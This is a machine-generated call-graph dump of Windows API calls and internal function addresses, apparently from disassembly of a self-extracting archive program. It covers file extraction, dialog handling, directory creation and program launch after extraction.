25245->25254 25249 b7cbfa 25246->25249 25289 b7d098 _wcslen 25247->25289 25248 b7d1ec 25252 b7d21c 25248->25252 25256 b6f937 53 API calls 25248->25256 25253 b64a20 _swprintf 51 API calls 25249->25253 25389 b6b341 25250->25389 25251 b7d884 97 API calls 25251->25248 25257 b7d884 97 API calls 25252->25257 25310 b7d2d4 25252->25310 25253->25235 25259 b7cc47 25254->25259 25261 b7d1ff SetDlgItemTextW 25256->25261 25262 b7d237 25257->25262 25258 b7d387 25263 b7d390 KiUserCallbackDispatcher 25258->25263 25264 b7d399 25258->25264 25259->25250 25265 b7cc4b 25259->25265 25269 b6f937 53 API calls 25261->25269 25272 b7d26e 25262->25272 25278 b7d249 25262->25278 25263->25264 25273 b7d3b6 25264->25273 25494 b612b3 GetDlgItem EnableWindow 25264->25494 25485 b7beff CreateDirectoryW LocalFree GetCurrentProcess GetLastError 25265->25485 25266 b7d0e9 25271 b6f937 53 API calls 25266->25271 25267 b7cc75 25395 b7bc19 SetCurrentDirectoryW 25267->25395 25268 b7cc6a GetLastError 25268->25267 25275 b7d213 SetDlgItemTextW 25269->25275 25271->25277 25280 b7d2c7 25272->25280 25281 b7d276 KiUserCallbackDispatcher 25272->25281 25282 b7d3e3 25273->25282 25295 b7d3d5 SendMessageW 25273->25295 25296 b7d3dd PostMessageW 25273->25296 25275->25252 25276 b7cc89 25284 b7cca0 25276->25284 25285 b7cc92 GetLastError 25276->25285 25492 b7aef5 32 API calls 25278->25492 25283 b7d884 97 API calls 25280->25283 25281->25280 25288 b7d285 25281->25288 25282->25277 25290 b6f937 53 API calls 25282->25290 25283->25310 25291 b7cd17 25284->25291 25298 b7cd26 25284->25298 25302 b7ccb0 GetTickCount 25284->25302 25285->25284 25287 b7d3ac 25495 b612b3 GetDlgItem EnableWindow 25287->25495 25288->25280 25300 b7d884 97 API calls 25288->25300 25289->25266 25294 b6f937 53 API calls 25289->25294 25301 b7ca52 25290->25301 25291->25298 25299 b7cf52 25291->25299 25292 b7d262 25292->25272 25303 b7d0cc 25294->25303 25295->25282 25296->25282 25297 b7d365 25493 b7aef5 32 API calls 25297->25493 25305 b7cef7 25298->25305 25307 b7cd3f GetModuleFileNameW 25298->25307 25308 b7ceed 25298->25308 25404 b612d1 GetDlgItem ShowWindow 25299->25404 25311 b7d29c 25300->25311 25301->25240 25301->25277 25309 b64a20 _swprintf 51 API calls 25302->25309 25312 b64a20 _swprintf 51 API calls 25303->25312 25315 b6f937 53 API calls 25305->25315 25486 b705ed 82 API calls 25307->25486 25308->25206 25308->25305 25318 b7cccd 25309->25318 25310->25258 25310->25297 25319 b6f937 53 API calls 25310->25319 25311->25280 25316 b7d2a5 DialogBoxParamW 25311->25316 25312->25266 25313 b7d384 25313->25258 25322 b7cf01 25315->25322 25316->25206 25316->25280 25317 b7cf62 25405 b612d1 GetDlgItem ShowWindow 25317->25405 25396 b6a8ce 25318->25396 25319->25310 25321 b7cd67 25323 b64a20 _swprintf 51 API calls 25321->25323 25324 b64a20 _swprintf 51 API calls 25322->25324 25327 b7cd89 CreateFileMappingW 25323->25327 25329 b7cf1f 25324->25329 25325 b7cf6c 25326 b6f937 53 API calls 25325->25326 25332 b7cf76 SetDlgItemTextW 25326->25332 25330 b7cde7 GetCommandLineW 25327->25330 25331 b7ce5e __InternalCxxFrameHandler 25327->25331 25341 b6f937 53 API calls 25329->25341 25336 b7cdf8 25330->25336 25334 b7ce69 ShellExecuteExW 25331->25334 25406 b612d1 GetDlgItem ShowWindow 25332->25406 25333 b7ccf3 25337 b7ccfa GetLastError 25333->25337 25338 b7cd05 25333->25338 25350 b7ce84 25334->25350 25487 b7c615 SHGetMalloc 25336->25487 25337->25338 25339 b6a801 80 API calls 25338->25339 25339->25291 25343 b7cf39 25341->25343 25342 b7cf88 SetDlgItemTextW GetDlgItem 25344 b7cfa5 GetWindowLongW SetWindowLongW 25342->25344 25345 b7cfbd 25342->25345 25344->25345 25407 b7d884 25345->25407 25346 b7ce14 25488 b7c615 SHGetMalloc 25346->25488 25349 b7ce20 25489 b7c615 SHGetMalloc 25349->25489 25361 b7cec7 25350->25361 25362 b7ceb3 Sleep 25350->25362 25352 b7d884 97 API calls 25354 b7cfd9 25352->25354 25432 b7eba2 25354->25432 25355 b7ce2c 25490 b7069c 82 API calls 25355->25490 25357 b7cedd UnmapViewOfFile CloseHandle 25357->25308 25360 b7ce3d MapViewOfFile 25360->25331 25361->25308 25361->25357 25362->25350 25362->25361 25363 b7d884 97 API calls 25366 b7cfff 25363->25366 25364 b7d028 25491 b612b3 GetDlgItem EnableWindow 25364->25491 25366->25364 25368 b7d884 97 API calls 25366->25368 25367->25206 25367->25231 25368->25364 25370 b612ff 25369->25370 25371 b61358 25369->25371 25373 b61365 25370->25373 25496 b6f608 62 API calls 2 library calls 25370->25496 25497 b6f5e1 GetWindowLongW SetWindowLongW 25371->25497 25373->25199 25373->25200 25373->25277 25375 b61321 25375->25373 25376 b61334 GetDlgItem 25375->25376 25376->25373 25377 b61344 25376->25377 25377->25373 25378 b6134a SetWindowTextW 25377->25378 25378->25373 25380 b7c758 5 API calls 25379->25380 25381 b7e625 GetDlgItem 25380->25381 25382 b7e647 25381->25382 25383 b7e67b SendMessageW SendMessageW 25381->25383 25386 b7e652 ShowWindow SendMessageW SendMessageW 25382->25386 25384 b7e6b7 25383->25384 25385 b7e6d6 SendMessageW SendMessageW SendMessageW 25383->25385 25384->25385 25387 b7e72c SendMessageW 25385->25387 25388 b7e709 SendMessageW 25385->25388 25386->25383 25387->25245 25388->25387 25392 b6b34b 25389->25392 25390 b6b3dc 25391 b6b542 8 API calls 25390->25391 25393 b6b405 25390->25393 25391->25393 25392->25390 25392->25393 25498 b6b542 25392->25498 25393->25267 25393->25268 25395->25276 25397 b6a8d8 25396->25397 25398 b6a935 CreateFileW 25397->25398 25399 b6a929 25397->25399 25398->25399 25400 b6a97f 25399->25400 25401 b6cf32 GetCurrentDirectoryW 25399->25401 25400->25333 25402 b6a964 25401->25402 25402->25400 25403 b6a968 CreateFileW 25402->25403 25403->25400 25404->25317 25405->25325 25406->25342 25408 b7d88e __EH_prolog 25407->25408 25409 b7c504 ExpandEnvironmentStringsW 25408->25409 25413 b7cfcb 25408->25413 25419 b7d8c5 _wcslen _wcsrchr 25409->25419 25411 b7c504 ExpandEnvironmentStringsW 25411->25419 25412 b7dbac SetWindowTextW 25412->25419 25413->25352 25416 b8521e 22 API calls 25416->25419 25418 b7d99a SetFileAttributesW 25421 b7da54 GetFileAttributesW 25418->25421 25431 b7d9b4 __cftof _wcslen 25418->25431 25419->25411 25419->25412 25419->25413 25419->25416 25419->25418 25424 b7dd76 GetDlgItem SetWindowTextW SendMessageW 25419->25424 25427 b7ddb6 SendMessageW 25419->25427 25519 b73316 CompareStringW 25419->25519 25520 b7b65d GetCurrentDirectoryW 25419->25520 25522 b6b9ca 6 API calls 25419->25522 25523 b6b953 FindClose 25419->25523 25524 b7c67e 76 API calls 2 library calls 25419->25524 25421->25419 25423 b7da66 DeleteFileW 25421->25423 25423->25419 25425 b7da77 25423->25425 25424->25419 25426 b64a20 _swprintf 51 API calls 25425->25426 25428 b7da97 GetFileAttributesW 25426->25428 25427->25419 25428->25425 25429 b7daac MoveFileW 25428->25429 25429->25419 25430 b7dac4 MoveFileExW 25429->25430 25430->25419 25431->25419 25431->25421 25521 b6cdc0 51 API calls 2 library calls 25431->25521 25433 b7ebac __EH_prolog 25432->25433 25525 b71983 25433->25525 25435 b7ebdd 25529 b664ed 25435->25529 25437 b7ebfb 25533 b68823 25437->25533 25441 b7ec4e 25551 b6890a 25441->25551 25443 b7cfea 25443->25363 25445 b7e7f8 25444->25445 25446 b7b5d6 4 API calls 25445->25446 25447 b7e7fd 25446->25447 25448 b7d111 25447->25448 25449 b7e805 GetWindow 25447->25449 25448->25207 25448->25208 25449->25448 25455 b7e825 25449->25455 25450 b7e832 GetClassNameW 26067 b73316 CompareStringW 25450->26067 25452 b7e856 GetWindowLongW 25453 b7e8ba GetWindow 25452->25453 25454 b7e866 SendMessageW 25452->25454 25453->25448 25453->25455 25454->25453 25456 b7e87c GetObjectW 25454->25456 25455->25448 25455->25450 25455->25452 25455->25453 26068 b7b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25456->26068 25458 b7e893 26069 b7b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25458->26069 26070 b7b81c 8 API calls 25458->26070 25461 b7e8a4 SendMessageW DeleteObject 25461->25453 25462->25223 25464 b7bc06 25463->25464 25465 b7bbe1 25463->25465 25467 b7bc14 25464->25467 25468 b7bc0b SHAutoComplete 25464->25468 26071 b73316 CompareStringW 25465->26071 25471 b7c217 25467->25471 25468->25467 25469 b7bbf4 25469->25464 25470 b7bbf8 FindWindowExW 25469->25470 25470->25464 25472 b7c221 __EH_prolog 25471->25472 25473 b613f8 43 API calls 25472->25473 25474 b7c243 25473->25474 26072 b62083 25474->26072 25477 b7c25d 25480 b61641 86 API calls 25477->25480 25478 b7c26c 25479 b61a7e 142 API calls 25478->25479 25482 b7c28b __InternalCxxFrameHandler ___std_exception_copy 25479->25482 25481 b7c268 25480->25481 25481->25248 25481->25251 25483 b61641 86 API calls 25482->25483 25483->25481 25484->25301 25485->25250 25486->25321 25487->25346 25488->25349 25489->25355 25490->25360 25491->25367 25492->25292 25493->25313 25494->25287 25495->25273 25496->25375 25497->25373 25499 b6b54f 25498->25499 25500 b6b573 25499->25500 25501 b6b566 CreateDirectoryW 25499->25501 25502 b6b4c1 3 API calls 25500->25502 25501->25500 25503 b6b5a6 25501->25503 25504 b6b579 25502->25504 25506 b6b5b5 25503->25506 25511 b6b8e6 25503->25511 25505 b6b5b9 GetLastError 25504->25505 25507 b6cf32 GetCurrentDirectoryW 25504->25507 25505->25506 25506->25392 25509 b6b58f 25507->25509 25509->25505 25510 b6b593 CreateDirectoryW 25509->25510 25510->25503 25510->25505 25512 b7ffd0 25511->25512 25513 b6b8f3 SetFileAttributesW 25512->25513 25514 b6b936 25513->25514 25515 b6b909 25513->25515 25514->25506 25516 b6cf32 GetCurrentDirectoryW 25515->25516 25517 b6b91d 25516->25517 25517->25514 25518 b6b921 SetFileAttributesW 25517->25518 25518->25514 25519->25419 25520->25419 25521->25431 25522->25419 25523->25419 25524->25419 25526 b71990 _wcslen 25525->25526 25560 b61895 25526->25560 25528 b719a8 25528->25435 25530 b71983 _wcslen 25529->25530 25531 b61895 78 API calls 25530->25531 25532 b719a8 25531->25532 25532->25437 25534 b6882d __EH_prolog 25533->25534 25573 b6e298 25534->25573 25536 b68855 25537 b7febe 27 API calls 25536->25537 25538 b68899 __cftof 25537->25538 25539 b7febe 27 API calls 25538->25539 25541 b688c0 25539->25541 25579 b75c64 25541->25579 25543 b68a38 25544 b68a42 25543->25544 25545 b68ab5 25544->25545 25608 b6b966 25544->25608 25548 b68b1a 25545->25548 25586 b690a2 25545->25586 25547 b68b5c 25547->25441 25548->25547 25614 b61397 74 API calls 25548->25614 26063 b6a41a 25551->26063 25553 b6892b 25554 b73546 86 API calls 25553->25554 25555 b6893c Concurrency::cancel_current_task 25553->25555 25554->25555 25556 b62111 26 API calls 25555->25556 25557 b68963 25556->25557 25558 b6e339 86 API calls 25557->25558 25559 b6896b 25558->25559 25559->25443 25561 b618a7 25560->25561 25567 b618ff 25560->25567 25562 b618d0 25561->25562 25570 b676e9 76 API calls __vswprintf_c_l 25561->25570 25564 b8521e 22 API calls 25562->25564 25566 b618f0 25564->25566 25565 b618c6 25571 b6775a 75 API calls 25565->25571 25566->25567 25572 b6775a 75 API calls 25566->25572 25567->25528 25570->25565 25571->25562 25572->25567 25574 b6e2a2 __EH_prolog 25573->25574 25575 b7febe 27 API calls 25574->25575 25576 b6e2e5 25575->25576 25577 b7febe 27 API calls 25576->25577 25578 b6e309 25577->25578 25578->25536 25580 b75c6e __EH_prolog 25579->25580 25581 b7febe 27 API calls 25580->25581 25582 b75c8a 25581->25582 25583 b688f2 25582->25583 25585 b72166 80 API calls 25582->25585 25583->25543 25585->25583 25587 b690ac __EH_prolog 25586->25587 25615 b613f8 25587->25615 25589 b690c8 25590 b690d9 25589->25590 25777 b6b1d2 25589->25777 25594 b69110 25590->25594 25625 b61ad3 25590->25625 25593 b6910c 25593->25594 25644 b62032 25593->25644 25769 b61641 25594->25769 25599 b69139 25606 b6b966 7 API calls 25599->25606 25607 b691b2 25599->25607 25781 b6d4d2 CompareStringW _wcslen 25599->25781 25602 b69211 25602->25594 25656 b64264 25602->25656 25668 b692c6 25602->25668 25606->25599 25648 b6924e 25607->25648 25609 b6b97b 25608->25609 25610 b6b9a9 25609->25610 26052 b6ba94 25609->26052 25610->25544 25612 b6b98b 25612->25610 25613 b6b990 FindClose 25612->25613 25613->25610 25614->25547 25616 b613fd __EH_prolog 25615->25616 25617 b6e298 27 API calls 25616->25617 25618 b61437 25617->25618 25619 b614ab 25618->25619 25620 b7febe 27 API calls 25618->25620 25782 b6c1f7 25619->25782 25621 b61498 25620->25621 25621->25619 25623 b6644d 43 API calls 25621->25623 25623->25619 25624 b61533 __cftof 25624->25589 25626 b61add __EH_prolog 25625->25626 25638 b61b30 25626->25638 25641 b61c63 25626->25641 25800 b613d9 25626->25800 25628 b61c9e 25803 b61397 74 API calls 25628->25803 25631 b64264 115 API calls 25635 b61ce9 25631->25635 25632 b61cab 25632->25631 25632->25641 25633 b61d31 25637 b61d64 25633->25637 25633->25641 25804 b61397 74 API calls 25633->25804 25635->25633 25636 b64264 115 API calls 25635->25636 25636->25635 25637->25641 25643 b6b110 79 API calls 25637->25643 25638->25628 25638->25632 25638->25641 25639 b64264 115 API calls 25640 b61db5 25639->25640 25640->25639 25640->25641 25641->25593 25642 b6b110 79 API calls 25642->25638 25643->25640 25646 b62037 __EH_prolog 25644->25646 25645 b62068 25645->25599 25646->25645 25818 b61a7e 25646->25818 25964 b6e395 25648->25964 25650 b6925e 25968 b72701 GetSystemTime SystemTimeToFileTime 25650->25968 25652 b691cc 25652->25602 25653 b72eb4 25652->25653 25969 b7efab 25653->25969 25657 b64274 25656->25657 25658 b64270 25656->25658 25667 b6b110 79 API calls 25657->25667 25658->25602 25659 b64286 25660 b642a1 25659->25660 25661 b642af 25659->25661 25666 b642e1 25660->25666 25977 b6395a 103 API calls 3 library calls 25660->25977 25978 b62eb6 115 API calls 3 library calls 25661->25978 25664 b642ad 25664->25666 25979 b62544 74 API calls 25664->25979 25666->25602 25667->25659 25669 b692d0 __EH_prolog 25668->25669 25672 b6930e 25669->25672 25679 b6973d Concurrency::cancel_current_task 25669->25679 25998 b79cad 117 API calls 25669->25998 25671 b6a18d 25673 b6a1c5 25671->25673 25674 b6a192 25671->25674 25672->25671 25676 b6932f 25672->25676 25672->25679 25673->25679 26028 b79cad 117 API calls 25673->26028 25674->25679 26027 b68675 166 API calls 25674->26027 25676->25679 25980 b666df 25676->25980 25679->25602 25680 b69405 25681 b69545 25680->25681 25999 b6b5d6 57 API calls 3 library calls 25680->25999 25681->25679 25685 b69669 25681->25685 26001 b68f6b 38 API calls 25681->26001 25689 b6b966 7 API calls 25685->25689 25691 b696db 25685->25691 25687 b695ac 26000 b88a18 26 API calls 2 library calls 25687->26000 25689->25691 25690 b69935 26008 b6e4a9 96 API calls 25690->26008 25986 b689c8 25691->25986 25694 b6976c 25716 b697c5 25694->25716 26002 b64727 27 API calls 2 library calls 25694->26002 25697 b69990 25698 b69a3a 25697->25698 25704 b699bb 25697->25704 25701 b69a8c 25698->25701 25714 b69a45 25698->25714 25706 b69a2c 25701->25706 26012 b68db3 119 API calls 25701->26012 25702 b69a8a 25707 b6a801 80 API calls 25702->25707 25703 b6a14a 25708 b6a801 80 API calls 25703->25708 25705 b69ae8 25704->25705 25704->25706 25709 b6b4c1 3 API calls 25704->25709 25705->25703 25728 b69b53 25705->25728 26013 b6ab1c 25705->26013 25706->25702 25706->25705 25707->25679 25708->25679 25711 b699f3 25709->25711 25711->25706 26010 b6a50a 97 API calls 25711->26010 25712 b6bf0a 27 API calls 25715 b69ba2 25712->25715 25714->25702 26011 b68b7c 123 API calls 25714->26011 25720 b6bf0a 27 API calls 25715->25720 25716->25679 25717 b698ed 25716->25717 25725 b698f4 Concurrency::cancel_current_task 25716->25725 26003 b687fb 41 API calls 25716->26003 26004 b6e4a9 96 API calls 25716->26004 26005 b6237a 74 API calls 25716->26005 26006 b68f28 98 API calls 25716->26006 26007 b6237a 74 API calls 25717->26007 25740 b69bb8 25720->25740 25725->25697 26009 b6851f 50 API calls 2 library calls 25725->26009 25726 b69b41 26017 b67951 77 API calls 25726->26017 25728->25712 25729 b69c8b 25730 b69ce7 25729->25730 25731 b69e85 25729->25731 25734 b69cff 25730->25734 25738 b69da7 25730->25738 25732 b69e97 25731->25732 25733 b69eab 25731->25733 25755 b69d20 25731->25755 25735 b6a475 137 API calls 25732->25735 25737 b74586 75 API calls 25733->25737 25736 b69d46 25734->25736 25745 b69d0e 25734->25745 25735->25755 25736->25755 26020 b6829b 111 API calls 25736->26020 25741 b69ec4 25737->25741 26021 b68f6b 38 API calls 25738->26021 25739 b69c62 25739->25729 26018 b6ac9c 82 API calls 25739->26018 25740->25729 25740->25739 25749 b6aa7a 79 API calls 25740->25749 25743 b7422f 137 API calls 25741->25743 25743->25755 26019 b6237a 74 API calls 25745->26019 25747 b69e76 25747->25602 25749->25739 25750 b69dec 25751 b69e1f 25750->25751 25752 b69e08 25750->25752 25750->25755 26023 b6a212 103 API calls __EH_prolog 25751->26023 26022 b68037 85 API calls 25752->26022 25755->25747 25758 b69fca 25755->25758 26024 b6237a 74 API calls 25755->26024 25757 b6a0d5 25757->25703 25760 b6b8e6 3 API calls 25757->25760 25758->25703 25758->25757 25759 b6a083 25758->25759 25992 b6b199 SetEndOfFile 25758->25992 25993 b6b032 25759->25993 25761 b6a130 25760->25761 25761->25703 26025 b6237a 74 API calls 25761->26025 25764 b6a0ca 25766 b6a880 77 API calls 25764->25766 25766->25757 25767 b6a140 26026 b67871 76 API calls 25767->26026 25770 b61653 25769->25770 25771 b61665 Concurrency::cancel_current_task 25769->25771 25770->25771 26042 b616b2 26 API calls 25770->26042 25773 b62111 26 API calls 25771->25773 25774 b61694 25773->25774 26043 b6e339 25774->26043 25778 b6b1e9 25777->25778 25779 b6b1f3 25778->25779 26051 b677af 78 API calls 25778->26051 25779->25590 25781->25599 25783 b6c20d __cftof 25782->25783 25788 b6c0d3 25783->25788 25795 b6c0b4 25788->25795 25790 b6c148 25791 b62111 25790->25791 25792 b6211c 25791->25792 25793 b6212b 25791->25793 25799 b6136b 26 API calls Concurrency::cancel_current_task 25792->25799 25793->25624 25796 b6c0c2 25795->25796 25797 b6c0bd 25795->25797 25796->25790 25798 b62111 26 API calls 25797->25798 25798->25796 25799->25793 25805 b61822 25800->25805 25803->25641 25804->25637 25806 b61834 25805->25806 25807 b613f2 25805->25807 25808 b6185d 25806->25808 25815 b676e9 76 API calls __vswprintf_c_l 25806->25815 25807->25642 25810 b8521e 22 API calls 25808->25810 25812 b6187a 25810->25812 25811 b61853 25816 b6775a 75 API calls 25811->25816 25812->25807 25817 b6775a 75 API calls 25812->25817 25815->25811 25816->25808 25817->25807 25819 b61a8e 25818->25819 25821 b61a8a 25818->25821 25822 b619c5 25819->25822 25821->25645 25823 b619d7 25822->25823 25824 b61a14 25822->25824 25825 b64264 115 API calls 25823->25825 25830 b646ce 25824->25830 25828 b619f7 25825->25828 25828->25821 25834 b646d7 25830->25834 25831 b64264 115 API calls 25831->25834 25832 b61a35 25832->25828 25835 b61f30 25832->25835 25834->25831 25834->25832 25847 b72128 25834->25847 25836 b61f3a __EH_prolog 25835->25836 25855 b642f1 25836->25855 25838 b61f61 25839 b61822 78 API calls 25838->25839 25846 b61fe8 25838->25846 25840 b61f78 25839->25840 25883 b6190b 78 API calls 25840->25883 25842 b61f90 25844 b61f9c _wcslen 25842->25844 25884 b72ed2 MultiByteToWideChar 25842->25884 25885 b6190b 78 API calls 25844->25885 25846->25828 25848 b7212f 25847->25848 25849 b7214a 25848->25849 25853 b676e4 RaiseException _com_raise_error 25848->25853 25851 b7215b SetThreadExecutionState 25849->25851 25854 b676e4 RaiseException _com_raise_error 25849->25854 25851->25834 25853->25849 25854->25851 25856 b642fb __EH_prolog 25855->25856 25857 b64311 25856->25857 25858 b6432d 25856->25858 25911 b61397 74 API calls 25857->25911 25860 b64588 25858->25860 25863 b64359 25858->25863 25931 b61397 74 API calls 25860->25931 25862 b6431c 25862->25838 25863->25862 25886 b74586 25863->25886 25865 b643da 25866 b64465 25865->25866 25882 b643d1 25865->25882 25914 b6e4a9 96 API calls 25865->25914 25896 b6bf0a 25866->25896 25867 b643d6 25867->25865 25913 b6252a 78 API calls 25867->25913 25869 b643c6 25912 b61397 74 API calls 25869->25912 25870 b643a8 25870->25865 25870->25867 25870->25869 25872 b64478 25876 b6450e 25872->25876 25877 b644fe 25872->25877 25915 b7422f 25876->25915 25900 b6a475 25877->25900 25880 b6450c 25880->25882 25924 b6237a 74 API calls 25880->25924 25925 b73546 25882->25925 25883->25842 25884->25844 25885->25846 25887 b7459b 25886->25887 25889 b745a5 ___std_exception_copy 25886->25889 25932 b6775a 75 API calls 25887->25932 25890 b746d5 25889->25890 25891 b7462b 25889->25891 25895 b7464f __cftof 25889->25895 25934 b83340 RaiseException 25890->25934 25933 b744b9 75 API calls 3 library calls 25891->25933 25894 b74701 25895->25870 25897 b6bf18 25896->25897 25899 b6bf22 25896->25899 25898 b7febe 27 API calls 25897->25898 25898->25899 25899->25872 25901 b6a47f __EH_prolog 25900->25901 25935 b68a1f 25901->25935 25904 b613d9 78 API calls 25905 b6a492 25904->25905 25938 b6e56c 25905->25938 25908 b6e56c 132 API calls 25909 b6a4a5 25908->25909 25909->25908 25910 b6a4ee 25909->25910 25947 b6e758 97 API calls __InternalCxxFrameHandler 25909->25947 25910->25880 25911->25862 25912->25882 25913->25865 25914->25866 25916 b74261 25915->25916 25917 b74238 25915->25917 25923 b74255 25916->25923 25962 b766d4 137 API calls 2 library calls 25916->25962 25918 b74257 25917->25918 25920 b7424d 25917->25920 25917->25923 25961 b773ae 132 API calls 25918->25961 25948 b77ddc 25920->25948 25923->25880 25924->25882 25926 b73550 25925->25926 25927 b73569 25926->25927 25930 b7357d 25926->25930 25963 b7220d 86 API calls 25927->25963 25929 b73570 Concurrency::cancel_current_task 25929->25930 25931->25862 25932->25889 25933->25895 25934->25894 25936 b6c619 GetVersionExW 25935->25936 25937 b68a24 25936->25937 25937->25904 25944 b6e582 __InternalCxxFrameHandler 25938->25944 25939 b6e6f2 25940 b6e726 25939->25940 25941 b6e523 6 API calls 25939->25941 25942 b72128 SetThreadExecutionState RaiseException 25940->25942 25941->25940 25945 b6e6e9 25942->25945 25943 b79cad 117 API calls 25943->25944 25944->25939 25944->25943 25944->25945 25946 b6bff5 91 API calls 25944->25946 25945->25909 25946->25944 25947->25909 25949 b747ad 75 API calls 25948->25949 25958 b77ded __InternalCxxFrameHandler 25949->25958 25950 b6e56c 132 API calls 25950->25958 25951 b781fe 25952 b763b9 98 API calls 25951->25952 25953 b7820e __InternalCxxFrameHandler 25952->25953 25953->25923 25954 b724ef 81 API calls 25954->25958 25955 b75011 132 API calls 25955->25958 25956 b78253 132 API calls 25956->25958 25957 b722a6 88 API calls 25957->25958 25958->25950 25958->25951 25958->25954 25958->25955 25958->25956 25958->25957 25959 b74b1c 98 API calls 25958->25959 25960 b788af 137 API calls 25958->25960 25959->25958 25960->25958 25961->25923 25962->25923 25963->25929 25965 b6e3a5 25964->25965 25967 b6e3ac 25964->25967 25966 b6aa7a 79 API calls 25965->25966 25966->25967 25967->25650 25968->25652 25970 b7efb8 25969->25970 25971 b6f937 53 API calls 25970->25971 25972 b7efdb 25971->25972 25973 b64a20 _swprintf 51 API calls 25972->25973 25974 b7efed 25973->25974 25975 b7e619 16 API calls 25974->25975 25976 b72eca 25975->25976 25976->25602 25977->25664 25978->25664 25979->25666 25981 b666ef 25980->25981 26029 b665fb 25981->26029 25983 b6675a 25983->25680 25985 b66722 25985->25983 26034 b6c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 25985->26034 25988 b689dd 25986->25988 25987 b68a15 25987->25679 25987->25690 25987->25694 25988->25987 26040 b67931 74 API calls 25988->26040 25990 b68a0d 26041 b61397 74 API calls 25990->26041 25992->25759 25994 b6b043 25993->25994 25997 b6b052 25993->25997 25995 b6b049 FlushFileBuffers 25994->25995 25994->25997 25995->25997 25996 b6b0cf SetFileTime 25996->25764 25997->25996 25998->25672 25999->25687 26000->25681 26001->25685 26002->25716 26003->25716 26004->25716 26005->25716 26006->25716 26007->25725 26008->25725 26009->25697 26010->25706 26011->25702 26012->25706 26014 b6ab25 GetFileType 26013->26014 26015 b69b2b 26013->26015 26014->26015 26015->25728 26016 b6237a 74 API calls 26015->26016 26016->25726 26017->25728 26018->25729 26019->25755 26020->25755 26021->25750 26022->25755 26023->25755 26024->25758 26025->25767 26026->25703 26027->25679 26028->25679 26035 b664f8 26029->26035 26031 b6661c 26031->25985 26033 b664f8 2 API calls 26033->26031 26034->25985 26038 b66502 26035->26038 26036 b665ea 26036->26031 26036->26033 26038->26036 26039 b6c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 26038->26039 26039->26038 26040->25990 26041->25987 26044 b6e34a Concurrency::cancel_current_task 26043->26044 26049 b6bd8e 86 API calls Concurrency::cancel_current_task 26044->26049 26046 b6e37c 26050 b6bd8e 86 API calls Concurrency::cancel_current_task 26046->26050 26048 b6e387 26049->26046 26050->26048 26051->25779 26053 b6baa1 26052->26053 26054 b6bb20 FindNextFileW 26053->26054 26055 b6baba FindFirstFileW 26053->26055 26056 b6bb2b GetLastError 26054->26056 26062 b6bb02 26054->26062 26057 b6bac9 26055->26057 26055->26062 26056->26062 26058 b6cf32 GetCurrentDirectoryW 26057->26058 26059 b6bad9 26058->26059 26060 b6baf7 GetLastError 26059->26060 26061 b6badd FindFirstFileW 26059->26061 26060->26062 26061->26060 26061->26062 26062->25612 26065 b6a425 26063->26065 26066 b6a458 __cftof 26063->26066 26064 b6b470 3 API calls 26064->26065 26065->26064 26065->26066 26066->25553 26067->25455 26068->25458 26069->25458 26070->25461 26071->25469 26073 b6b1d2 78 API calls 26072->26073 26074 b6208f 26073->26074 26075 b61ad3 115 API calls 26074->26075 26078 b620ac 26074->26078 26076 b6209c 26075->26076 26076->26078 26079 b61397 74 API calls 26076->26079 26078->25477 26078->25478 26079->26078 26133 b7d8d8 97 API calls 4 library calls 26178 b84bd0 5 API calls CatchGuardHandler 26104 b8b8c0 21 API calls 26105 b89cc0 7 API calls ___scrt_uninitialize_crt 26136 b93dc0 VariantClear 26179 b903c0 51 API calls 26180 b7d8d8 102 API calls 4 library calls 26106 b62037 142 API calls __EH_prolog 26138 b70534 FreeLibrary 24099 b7f431 24100 b7f335 24099->24100 24102 b7f9e9 24100->24102 24128 b7f747 24102->24128 24104 b7f9f9 24105 b7fa56 24104->24105 24109 b7fa7a 24104->24109 24106 b7f987 DloadReleaseSectionWriteAccess 6 API calls 24105->24106 24107 b7fa61 RaiseException 24106->24107 24123 b7fc4f 24107->24123 24108 b7faf2 LoadLibraryExA 24110 b7fb05 GetLastError 24108->24110 24111 b7fb53 24108->24111 24109->24108 24109->24111 24112 b7fb65 24109->24112 24116 b7fc21 24109->24116 24114 b7fb2e 24110->24114 24122 b7fb18 24110->24122 24111->24112 24113 b7fb5e FreeLibrary 24111->24113 24115 b7fbc3 GetProcAddress 24112->24115 24112->24116 24113->24112 24117 b7f987 DloadReleaseSectionWriteAccess 6 API calls 24114->24117 24115->24116 24118 b7fbd3 GetLastError 24115->24118 24137 b7f987 24116->24137 24119 b7fb39 RaiseException 24117->24119 24120 b7fbe6 24118->24120 24119->24123 24120->24116 24124 b7f987 DloadReleaseSectionWriteAccess 6 API calls 24120->24124 24122->24111 24122->24114 24123->24100 24125 b7fc07 RaiseException 24124->24125 24126 b7f747 ___delayLoadHelper2@8 6 API calls 24125->24126 24127 b7fc1e 24126->24127 24127->24116 24129 b7f753 24128->24129 24130 b7f779 24128->24130 24145 b7f7f0 24129->24145 24130->24104 24132 b7f758 24133 b7f774 24132->24133 24148 b7f919 24132->24148 24153 b7f77a GetModuleHandleW GetProcAddress GetProcAddress 24133->24153 24136 b7f9c2 24136->24104 24138 b7f9bb 24137->24138 24139 b7f999 24137->24139 24138->24123 24140 b7f7f0 DloadReleaseSectionWriteAccess 3 API calls 24139->24140 24141 b7f99e 24140->24141 24142 b7f9b6 24141->24142 24143 b7f919 DloadProtectSection 3 API calls 24141->24143 24156 b7f9bd GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24142->24156 24143->24142 24154 b7f77a GetModuleHandleW GetProcAddress GetProcAddress 24145->24154 24147 b7f7f5 24147->24132 24151 b7f92e DloadProtectSection 24148->24151 24149 b7f934 24149->24133 24150 b7f969 VirtualProtect 24150->24149 24151->24149 24151->24150 24155 b7f82f VirtualQuery GetSystemInfo 24151->24155 24153->24136 24154->24147 24155->24150 24156->24138 26107 b62430 26 API calls std::bad_exception::bad_exception 26182 b89330 52 API calls 2 library calls 26183 b80733 20 API calls 26162 b8962a 55 API calls _free 26108 b61025 29 API calls 26140 b66920 41 API calls __EH_prolog 26109 b7d420 91 API calls _swprintf 24205 b8a620 24213 b8bf6f 24205->24213 24208 b8a634 24210 b8a63c 24211 b8a649 24210->24211 24221 b8a650 11 API calls 24210->24221 24214 b8be58 _abort 5 API calls 24213->24214 24215 b8bf96 24214->24215 24216 b8bfae TlsAlloc 24215->24216 24217 b8bf9f 24215->24217 24216->24217 24218 b80d7c 